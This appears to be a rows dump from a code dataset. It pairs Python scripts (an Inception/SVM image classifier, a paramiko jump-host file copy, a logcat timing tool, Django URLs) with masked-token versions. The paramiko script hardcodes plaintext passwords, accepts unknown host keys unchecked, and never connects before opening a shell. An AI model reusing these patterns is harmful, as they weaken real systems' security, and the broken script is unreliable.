code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import re
import sys
import tarfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn import datasets
from sklearn import svm
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression
from numpy import genfromtxt
def create_graph():
"""Creates a graph from saved GraphDef file and returns a saver."""
# Creates graph from saved graph_def.pb.
with tf.gfile.FastGFile(os.path.join(
'/home/ubuntu/hdd/tensorFlowDic/', 'classify_image_graph_def.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def feature_extraction(image):
image_data = tf.gfile.FastGFile(image, 'rb').read()
with tf.Session() as sess:
softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')
predictions = sess.run(softmax_tensor,{'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
return predictions
# create_graph()
# input_x = np.zeros((0,2048))
# for i in range(1,7001):
# imageName = str(i).zfill(5)
# image = '/home/ubuntu/caffe/examples/images/joey/'+imageName+".jpg"
# pre = feature_extraction(image)
# print ("Finish extracting features of training image "+image)
# input_x = np.vstack((input_x,pre))
# print(input_x.shape)
test_x = np.zeros((0,2048))
for i in range(1,971):
imageName = str(i).zfill(5)
image = '/home/ubuntu/caffe/examples/images/val/'+imageName+".jpg"
pre = feature_extraction(image)
print ("Finish extracting features of test image "+image)
test_x = np.vstack((test_x,pre))
print(test_x.shape)
input_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv', delimiter=',')
input_label = input_label[1:7001,1].reshape(-1)
input_x = np.load("tensorFlow_train.npz")
#np.load("tensorFlow_test.npz")
print ('input_x shape ',input_x.shape)
print ('input_label shape ',input_label.shape)
# np.savez_compressed("tensorFlow_train", input_x)
np.savez_compressed("tensorFlow_test", test_x)
X_train, X_test, y_train, y_test = train_test_split(input_x, input_label, test_size=0.1, random_state=42)
clf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)
clf.fit(X_train, y_train)
print('training accuracy is', clf.score(X_train,y_train))
print('validation accuracy is', clf.score(X_test,y_test))
clf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)
clf.fit(input_x, input_label)
y_pred = clf.predict(test_x)
filename = "predict_inception_v3.csv"
f = open(filename, "w")
f.write('Id,Prediction\n')
if ((len(y_pred))<1000):
zeros = np.zeros(2000)
y_pred = np.append(y_pred, zeros).reshape(-1)
for i in range(0,len(y_pred)):
d = '{0},{1}\n'.format(i+1,int(y_pred[i]))
f.write(d)
|
normal
|
{
"blob_id": "8ef20a7a93d6affabe88dad4e5d19613fe47dd0f",
"index": 5399,
"step-1": "<mask token>\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\n<mask token>\nfor i in range(1, 971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/' + imageName + '.jpg'\n pre = feature_extraction(image)\n print('Finish extracting features of test image ' + image)\n test_x = np.vstack((test_x, pre))\nprint(test_x.shape)\n<mask token>\nprint('input_x shape ', input_x.shape)\nprint('input_label shape ', input_label.shape)\nnp.savez_compressed('tensorFlow_test', test_x)\n<mask token>\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train, y_train))\nprint('validation accuracy is', clf.score(X_test, y_test))\n<mask token>\nclf.fit(input_x, input_label)\n<mask token>\nf.write('Id,Prediction\\n')\nif len(y_pred) < 1000:\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\nfor i in range(0, len(y_pred)):\n d = '{0},{1}\\n'.format(i + 1, int(y_pred[i]))\n f.write(d)\n",
"step-3": "<mask token>\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\ntest_x = np.zeros((0, 2048))\nfor i in range(1, 971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/' + imageName + '.jpg'\n pre = feature_extraction(image)\n print('Finish extracting features of test image ' + image)\n test_x = np.vstack((test_x, pre))\nprint(test_x.shape)\ninput_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv',\n delimiter=',')\ninput_label = input_label[1:7001, 1].reshape(-1)\ninput_x = np.load('tensorFlow_train.npz')\nprint('input_x shape ', input_x.shape)\nprint('input_label shape ', input_label.shape)\nnp.savez_compressed('tensorFlow_test', test_x)\nX_train, X_test, y_train, y_test = train_test_split(input_x, input_label,\n test_size=0.1, random_state=42)\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train, y_train))\nprint('validation accuracy is', clf.score(X_test, y_test))\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(input_x, input_label)\ny_pred = clf.predict(test_x)\nfilename = 'predict_inception_v3.csv'\nf = open(filename, 'w')\nf.write('Id,Prediction\\n')\nif len(y_pred) < 1000:\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\nfor i in range(0, len(y_pred)):\n d = '{0},{1}\\n'.format(i + 1, int(y_pred[i]))\n f.write(d)\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os.path\nimport re\nimport sys\nimport tarfile\nimport numpy as np\nfrom six.moves import urllib\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom numpy import genfromtxt\n\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n with tf.gfile.FastGFile(os.path.join('/home/ubuntu/hdd/tensorFlowDic/',\n 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\n\ndef feature_extraction(image):\n image_data = tf.gfile.FastGFile(image, 'rb').read()\n with tf.Session() as sess:\n softmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n predictions = sess.run(softmax_tensor, {'DecodeJpeg/contents:0':\n image_data})\n predictions = np.squeeze(predictions)\n return predictions\n\n\ntest_x = np.zeros((0, 2048))\nfor i in range(1, 971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/' + imageName + '.jpg'\n pre = feature_extraction(image)\n print('Finish extracting features of test image ' + image)\n test_x = np.vstack((test_x, pre))\nprint(test_x.shape)\ninput_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv',\n delimiter=',')\ninput_label = input_label[1:7001, 1].reshape(-1)\ninput_x = np.load('tensorFlow_train.npz')\nprint('input_x shape ', input_x.shape)\nprint('input_label shape ', input_label.shape)\nnp.savez_compressed('tensorFlow_test', test_x)\nX_train, X_test, y_train, y_test = train_test_split(input_x, input_label,\n test_size=0.1, random_state=42)\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train, y_train))\nprint('validation accuracy is', clf.score(X_test, y_test))\nclf = SVC(C=500.0, decision_function_shape='ovr', max_iter=-1, probability=\n False)\nclf.fit(input_x, input_label)\ny_pred = clf.predict(test_x)\nfilename = 'predict_inception_v3.csv'\nf = open(filename, 'w')\nf.write('Id,Prediction\\n')\nif len(y_pred) < 1000:\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\nfor i in range(0, len(y_pred)):\n d = '{0},{1}\\n'.format(i + 1, int(y_pred[i]))\n f.write(d)\n",
"step-5": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os.path\nimport re\nimport sys\nimport tarfile\n\nimport numpy as np\nfrom six.moves import urllib\nimport tensorflow as tf\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom numpy import genfromtxt\n\ndef create_graph():\n \"\"\"Creates a graph from saved GraphDef file and returns a saver.\"\"\"\n # Creates graph from saved graph_def.pb.\n with tf.gfile.FastGFile(os.path.join(\n '/home/ubuntu/hdd/tensorFlowDic/', 'classify_image_graph_def.pb'), 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n\ndef feature_extraction(image):\n\n\timage_data = tf.gfile.FastGFile(image, 'rb').read()\n\twith tf.Session() as sess:\n\t\tsoftmax_tensor = sess.graph.get_tensor_by_name('pool_3:0')\n\t\tpredictions = sess.run(softmax_tensor,{'DecodeJpeg/contents:0': image_data})\n\t\tpredictions = np.squeeze(predictions)\n\t\treturn predictions\n\n\n# create_graph()\n# input_x = np.zeros((0,2048))\n# for i in range(1,7001):\n# imageName = str(i).zfill(5)\n# image = '/home/ubuntu/caffe/examples/images/joey/'+imageName+\".jpg\"\n# pre = feature_extraction(image)\n# print (\"Finish extracting features of training image \"+image)\n# input_x = np.vstack((input_x,pre))\n\n# print(input_x.shape)\n\ntest_x = np.zeros((0,2048))\nfor i in range(1,971):\n imageName = str(i).zfill(5)\n image = '/home/ubuntu/caffe/examples/images/val/'+imageName+\".jpg\"\n pre = feature_extraction(image)\n print (\"Finish extracting features of test image \"+image)\n test_x = np.vstack((test_x,pre))\n\nprint(test_x.shape)\n\ninput_label = genfromtxt('/home/ubuntu/caffe/examples/images/Files/train.csv', delimiter=',')\ninput_label = input_label[1:7001,1].reshape(-1)\ninput_x = np.load(\"tensorFlow_train.npz\")\n#np.load(\"tensorFlow_test.npz\")\n\nprint ('input_x shape ',input_x.shape)\nprint ('input_label shape ',input_label.shape)\n\n\n# np.savez_compressed(\"tensorFlow_train\", input_x)\nnp.savez_compressed(\"tensorFlow_test\", test_x)\n\nX_train, X_test, y_train, y_test = train_test_split(input_x, input_label, test_size=0.1, random_state=42)\n\nclf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)\nclf.fit(X_train, y_train)\nprint('training accuracy is', clf.score(X_train,y_train))\nprint('validation accuracy is', clf.score(X_test,y_test))\n\nclf = SVC(C=500.0,decision_function_shape='ovr',max_iter=-1,probability=False)\nclf.fit(input_x, input_label)\n\ny_pred = clf.predict(test_x)\nfilename = \"predict_inception_v3.csv\"\nf = open(filename, \"w\")\nf.write('Id,Prediction\\n')\n\nif ((len(y_pred))<1000):\n zeros = np.zeros(2000)\n y_pred = np.append(y_pred, zeros).reshape(-1)\n \nfor i in range(0,len(y_pred)):\n d = '{0},{1}\\n'.format(i+1,int(y_pred[i]))\n f.write(d)\n\n\n\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python3
# coding=utf-8
# title :paramiko_sftp.py
# description :
# author :JackieTsui
# organization :pytoday.org
# date :1/16/18 9:22 PM
# email :jackietsui72@gmail.com
# notes :
# ==================================================
# Import the module needed to run the script
import paramiko
import os,sys,time
jumpip = "192.168.10.1"
jumpuser = "jackie"
jumppass = "123456"
hostname = "192.168.10.2"
user = "root"
password = "654321"
tmpdir = "/tmp"
remotedir = "/data"
localpath = "/home/nginx_access.tar.gz"
tmppath = tmpdir + "/nginx_access.tar.gz"
remotepath = remotedir + "/nginx_access_hd.tar.gz"
port = 22
passinfo = "'s password: "
paramiko.util.log_to_file('syslogin.log')
t = paramiko.Transport((jumpip, port))
t.connect(username=jumpuser, password=jumppass)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.put(localpath, remotepath)
sftp.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
channel = ssh.invoke_shell()
channel.settimeout(10)
buff = ""
resp = ""
channel.send("scp " + tmppath + " " + user + "@" + hostname + ":" + remotepath + "\n")
while not buff.endswith(passinfo):
try:
resp = channel.recv(9999)
except Exception as e:
print("Error info: " + str(e))
channel.close()
ssh.close()
sys.exit()
buff += resp
if not buff.find("yes/no") == -1:
channel.send("yes\n")
buff = ""
channel.send(password + "\n")
buff = ""
while not buff.endswith("# "):
resp = channel.recv(9999)
if not resp.find(passinfo) == -1:
print("Error info: Auth failed.")
channel.close()
ssh.close()
sys.exit()
buff += resp
print(buff)
channel.close()
ssh.close()
|
normal
|
{
"blob_id": "64cf6b03fb68be8a23c6e87c8d68d0a42db0eb54",
"index": 6451,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparamiko.util.log_to_file('syslogin.log')\n<mask token>\nt.connect(username=jumpuser, password=jumppass)\n<mask token>\nsftp.put(localpath, remotepath)\nsftp.close()\n<mask token>\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n<mask token>\nchannel.settimeout(10)\n<mask token>\nchannel.send('scp ' + tmppath + ' ' + user + '@' + hostname + ':' +\n remotepath + '\\n')\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print('Error info: ' + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find('yes/no') == -1:\n channel.send('yes\\n')\n buff = ''\nchannel.send(password + '\\n')\n<mask token>\nwhile not buff.endswith('# '):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print('Error info: Auth failed.')\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\nprint(buff)\nchannel.close()\nssh.close()\n",
"step-3": "<mask token>\njumpip = '192.168.10.1'\njumpuser = 'jackie'\njumppass = '123456'\nhostname = '192.168.10.2'\nuser = 'root'\npassword = '654321'\ntmpdir = '/tmp'\nremotedir = '/data'\nlocalpath = '/home/nginx_access.tar.gz'\ntmppath = tmpdir + '/nginx_access.tar.gz'\nremotepath = remotedir + '/nginx_access_hd.tar.gz'\nport = 22\npassinfo = \"'s password: \"\nparamiko.util.log_to_file('syslogin.log')\nt = paramiko.Transport((jumpip, port))\nt.connect(username=jumpuser, password=jumppass)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put(localpath, remotepath)\nsftp.close()\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nchannel = ssh.invoke_shell()\nchannel.settimeout(10)\nbuff = ''\nresp = ''\nchannel.send('scp ' + tmppath + ' ' + user + '@' + hostname + ':' +\n remotepath + '\\n')\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print('Error info: ' + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find('yes/no') == -1:\n channel.send('yes\\n')\n buff = ''\nchannel.send(password + '\\n')\nbuff = ''\nwhile not buff.endswith('# '):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print('Error info: Auth failed.')\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\nprint(buff)\nchannel.close()\nssh.close()\n",
"step-4": "import paramiko\nimport os, sys, time\njumpip = '192.168.10.1'\njumpuser = 'jackie'\njumppass = '123456'\nhostname = '192.168.10.2'\nuser = 'root'\npassword = '654321'\ntmpdir = '/tmp'\nremotedir = '/data'\nlocalpath = '/home/nginx_access.tar.gz'\ntmppath = tmpdir + '/nginx_access.tar.gz'\nremotepath = remotedir + '/nginx_access_hd.tar.gz'\nport = 22\npassinfo = \"'s password: \"\nparamiko.util.log_to_file('syslogin.log')\nt = paramiko.Transport((jumpip, port))\nt.connect(username=jumpuser, password=jumppass)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put(localpath, remotepath)\nsftp.close()\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nchannel = ssh.invoke_shell()\nchannel.settimeout(10)\nbuff = ''\nresp = ''\nchannel.send('scp ' + tmppath + ' ' + user + '@' + hostname + ':' +\n remotepath + '\\n')\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print('Error info: ' + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find('yes/no') == -1:\n channel.send('yes\\n')\n buff = ''\nchannel.send(password + '\\n')\nbuff = ''\nwhile not buff.endswith('# '):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print('Error info: Auth failed.')\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\nprint(buff)\nchannel.close()\nssh.close()\n",
"step-5": "#!/usr/bin/env python3\n# coding=utf-8\n# title :paramiko_sftp.py\n# description :\n# author :JackieTsui\n# organization :pytoday.org\n# date :1/16/18 9:22 PM\n# email :jackietsui72@gmail.com\n# notes :\n# ==================================================\n\n# Import the module needed to run the script\nimport paramiko\nimport os,sys,time\n\n\njumpip = \"192.168.10.1\"\njumpuser = \"jackie\"\njumppass = \"123456\"\nhostname = \"192.168.10.2\"\nuser = \"root\"\npassword = \"654321\"\n\ntmpdir = \"/tmp\"\nremotedir = \"/data\"\nlocalpath = \"/home/nginx_access.tar.gz\"\ntmppath = tmpdir + \"/nginx_access.tar.gz\"\nremotepath = remotedir + \"/nginx_access_hd.tar.gz\"\nport = 22\npassinfo = \"'s password: \"\nparamiko.util.log_to_file('syslogin.log')\n\nt = paramiko.Transport((jumpip, port))\nt.connect(username=jumpuser, password=jumppass)\nsftp = paramiko.SFTPClient.from_transport(t)\nsftp.put(localpath, remotepath)\nsftp.close()\n\nssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\nchannel = ssh.invoke_shell()\nchannel.settimeout(10)\n\nbuff = \"\"\nresp = \"\"\nchannel.send(\"scp \" + tmppath + \" \" + user + \"@\" + hostname + \":\" + remotepath + \"\\n\")\nwhile not buff.endswith(passinfo):\n try:\n resp = channel.recv(9999)\n except Exception as e:\n print(\"Error info: \" + str(e))\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n if not buff.find(\"yes/no\") == -1:\n channel.send(\"yes\\n\")\n buff = \"\"\n\nchannel.send(password + \"\\n\")\n\nbuff = \"\"\nwhile not buff.endswith(\"# \"):\n resp = channel.recv(9999)\n if not resp.find(passinfo) == -1:\n print(\"Error info: Auth failed.\")\n channel.close()\n ssh.close()\n sys.exit()\n buff += resp\n\nprint(buff)\nchannel.close()\nssh.close()\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
# !/usr/bin/python
import re
import sys
import xlwt
import os
'''
python logcat_time.py config_file logcat_file
'''
config_file = sys.argv[1]
logcat_file = sys.argv[2]
turns_time = 0
turn_compelete_flag = 0
def get_filePath_fileName_fileExt(filename):
(filepath, tempfilename) = os.path.split(filename);
(shotname, extension) = os.path.splitext(tempfilename);
return filepath, shotname, extension
#时间字串模板09:52:24.761
def time_str_distance(old_time_str, new_time_str):
rst1 = map(int, re.split(':|\.', old_time_str))
rst2 = map(int, re.split(':|\.', new_time_str))
distance = (rst2[0] * 60 * 60 * 1000 + rst2[1] * 60 * 1000 + rst2[2] * 1000 + rst2[3]) - (
rst1[0] * 60 * 60 * 1000 + rst1[1] * 60 * 1000 + rst1[2] * 1000 + rst1[3])
return distance
def read_tag_pair_config(file_path):
f = open(file_path)
pair_count = 0
pair_list = []
for line in f:
line = line.strip()
config_list = line.split('@')
pair_list.append(config_list)
pair_count = pair_count + 1
return pair_list,pair_count
def caculate_tag_distance(str1, str2):
f = open(logcat_file)
finish_time = ''
start_time = ''
turn_times = 0
for line in f:
turn_compelete_flag = False
if str1 in line:
turn_compelete_flag = False
start_time = line.split()[1]
if str2 in line:
turn_compelete_flag = True
finish_time = line.split()[1]
if turn_compelete_flag:
turn_times = turn_times + 1
str_distance = time_str_distance(start_time, finish_time)
print str_distance
def generate_excel(plist_time_pair,pair_count):
result_sheet = xlwt.Workbook(encoding='utf-8')
sheet = result_sheet.add_sheet('result')
# 生成表头
i = 0
for pair in tag_pair_list:
sheet.write(0, i, pair[0])
i = i + 1
sheet.write(0, i, "总时间")
# 生成数据
j = 1
c = 0
for time_pair in plist_time_pair:
print "----------------------------"
m = 0
#print time_pair, c
for tag_time_pair in time_pair:
time_distance = time_str_distance(tag_time_pair[0], tag_time_pair[1])
sheet.write(j, m, time_distance)
m = m + 1
print "---->",time_distance
start_time_point = time_pair[0][0]
finish_time_point = time_pair[pair_count - 1][1]
all_time = time_str_distance(start_time_point, finish_time_point)
sheet.write(j, m, all_time)
c = c + 1
j = j + 1
(file_p, file_s, file_e) = get_filePath_fileName_fileExt(logcat_file)
result_sheet.save(file_s + '_out.xls')
print ("Finished save output to excel!")
(tag_pair_list,pair_count) = read_tag_pair_config(config_file)
time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]
f = open(logcat_file)
list_time_pair = []
for line in f:
i = 0
if line == '\n':
continue
for pair in tag_pair_list:
if pair[1].strip() in line:
time_stamp[i][0] = line.split()[1]
if pair[2].strip() in line:
time_stamp[i][1] = line.split()[1]
if i == pair_count - 1:
compeled_flag = False
for tm_st in time_stamp:
if tm_st[0] == 0 or tm_st[1] == 0:
compeled_flag = False
break
else:
compeled_flag = True
if compeled_flag:
list_time_pair.append(time_stamp)
all_time = time_str_distance(time_stamp[0][0], time_stamp[pair_count - 1][1])
#print "all time:", all_time
time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)] # 二位数组置空
i = i + 1
print '=================='
generate_excel(list_time_pair,pair_count)
|
normal
|
{
"blob_id": "585c0f89605f1d791b449f42412174f06d0c5db5",
"index": 5163,
"step-1": "# -*- coding: utf-8 -*-\n# !/usr/bin/python\nimport re\nimport sys\nimport xlwt\nimport os\n\n'''\npython logcat_time.py config_file logcat_file\n'''\n\nconfig_file = sys.argv[1]\nlogcat_file = sys.argv[2]\n\nturns_time = 0\nturn_compelete_flag = 0\n\ndef get_filePath_fileName_fileExt(filename):\n (filepath, tempfilename) = os.path.split(filename);\n (shotname, extension) = os.path.splitext(tempfilename);\n return filepath, shotname, extension\n\n#时间字串模板09:52:24.761\ndef time_str_distance(old_time_str, new_time_str):\n rst1 = map(int, re.split(':|\\.', old_time_str))\n rst2 = map(int, re.split(':|\\.', new_time_str))\n distance = (rst2[0] * 60 * 60 * 1000 + rst2[1] * 60 * 1000 + rst2[2] * 1000 + rst2[3]) - (\n rst1[0] * 60 * 60 * 1000 + rst1[1] * 60 * 1000 + rst1[2] * 1000 + rst1[3])\n return distance\n\ndef read_tag_pair_config(file_path):\n f = open(file_path)\n pair_count = 0\n pair_list = []\n for line in f:\n line = line.strip()\n config_list = line.split('@')\n pair_list.append(config_list)\n pair_count = pair_count + 1\n return pair_list,pair_count\n\ndef caculate_tag_distance(str1, str2):\n f = open(logcat_file)\n finish_time = ''\n start_time = ''\n turn_times = 0\n for line in f:\n turn_compelete_flag = False\n if str1 in line:\n turn_compelete_flag = False\n start_time = line.split()[1]\n if str2 in line:\n turn_compelete_flag = True\n finish_time = line.split()[1]\n if turn_compelete_flag:\n turn_times = turn_times + 1\n str_distance = time_str_distance(start_time, finish_time)\n print str_distance\n\ndef generate_excel(plist_time_pair,pair_count):\n result_sheet = xlwt.Workbook(encoding='utf-8')\n sheet = result_sheet.add_sheet('result')\n # 生成表头\n i = 0\n for pair in tag_pair_list:\n sheet.write(0, i, pair[0])\n i = i + 1\n sheet.write(0, i, \"总时间\")\n # 生成数据\n j = 1\n c = 0\n for time_pair in plist_time_pair:\n print \"----------------------------\"\n m = 0\n #print time_pair, c\n for tag_time_pair in time_pair:\n time_distance = time_str_distance(tag_time_pair[0], tag_time_pair[1])\n sheet.write(j, m, time_distance)\n m = m + 1\n print \"---->\",time_distance\n start_time_point = time_pair[0][0]\n finish_time_point = time_pair[pair_count - 1][1]\n all_time = time_str_distance(start_time_point, finish_time_point)\n sheet.write(j, m, all_time)\n c = c + 1\n j = j + 1\n (file_p, file_s, file_e) = get_filePath_fileName_fileExt(logcat_file)\n result_sheet.save(file_s + '_out.xls')\n print (\"Finished save output to excel!\")\n\n\n(tag_pair_list,pair_count) = read_tag_pair_config(config_file)\ntime_stamp = [[0 for _ in range(2)] for _ in range(pair_count)]\n\nf = open(logcat_file)\nlist_time_pair = []\nfor line in f:\n i = 0\n if line == '\\n':\n continue\n for pair in tag_pair_list:\n if pair[1].strip() in line:\n time_stamp[i][0] = line.split()[1]\n if pair[2].strip() in line:\n time_stamp[i][1] = line.split()[1]\n if i == pair_count - 1:\n compeled_flag = False\n for tm_st in time_stamp:\n if tm_st[0] == 0 or tm_st[1] == 0:\n compeled_flag = False\n break\n else:\n compeled_flag = True\n if compeled_flag:\n list_time_pair.append(time_stamp)\n all_time = time_str_distance(time_stamp[0][0], time_stamp[pair_count - 1][1])\n #print \"all time:\", all_time\n time_stamp = [[0 for _ in range(2)] for _ in range(pair_count)] # 二位数组置空\n i = i + 1\nprint '=================='\n\ngenerate_excel(list_time_pair,pair_count)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.contrib import admin
from django.contrib.staticfiles.urls import static # 本Ch11.1
from django.urls import path, include
from . import settings_common, settings_dev # 本Ch11.1
import debug_toolbar
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('login_test_app.urls')),
path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218
path('__debug__/', include(debug_toolbar.urls)),
]
# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から
# 返されたルーティングを追加する
urlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)
|
normal
|
{
"blob_id": "ce626afa7c0fd2e190afd92b57a0ebebf19f9e9b",
"index": 6842,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-3": "<mask token>\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-4": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static\nfrom django.urls import path, include\nfrom . import settings_common, settings_dev\nimport debug_toolbar\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-5": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static # 本Ch11.1\nfrom django.urls import path, include\n\nfrom . import settings_common, settings_dev # 本Ch11.1\nimport debug_toolbar\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('login_test_app.urls')),\n path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218\n path('__debug__/', include(debug_toolbar.urls)),\n\n]\n\n# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から\n# 返されたルーティングを追加する\nurlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class GetCollectionItemidsTest(TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
